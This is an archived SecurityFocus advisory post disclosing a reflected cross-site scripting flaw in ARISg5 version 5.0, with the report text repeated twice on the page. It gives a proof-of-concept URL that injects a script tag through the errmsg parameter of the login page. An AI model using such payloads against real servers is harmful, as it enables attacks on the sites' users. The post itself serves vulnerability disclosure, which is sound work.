Back to list
|
Post reply
ARISg5 (version 5.0) cross site scripting vulnerability
Feb 26 2010 01:30AM
Yaniv Miron (lament ilhack org)
Hello,
Please see the following report:
ARISg5 (version 5.0) cross site scripting vulnerability
-----------------------------------------------------------------------
Application name: ARISg5 (arisglobal)
Version: 5.0
Class: Input Validation Error
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron
Exploit:
http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test
XSS')</script>
Yaniv Miron aka "Lament".
lament (at) ilhack (dot) org [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Please see the following report:
ARISg5 (version 5.0) cross site scripting vulnerability
-----------------------------------------------------------------------
Application name: ARISg5 (arisglobal)
Version: 5.0
Class: Input Validation Error
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron
Exploit:
http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test
XSS')</script>
Yaniv Miron aka "Lament".
lament (at) ilhack (dot) org [email concealed]
[ reply ]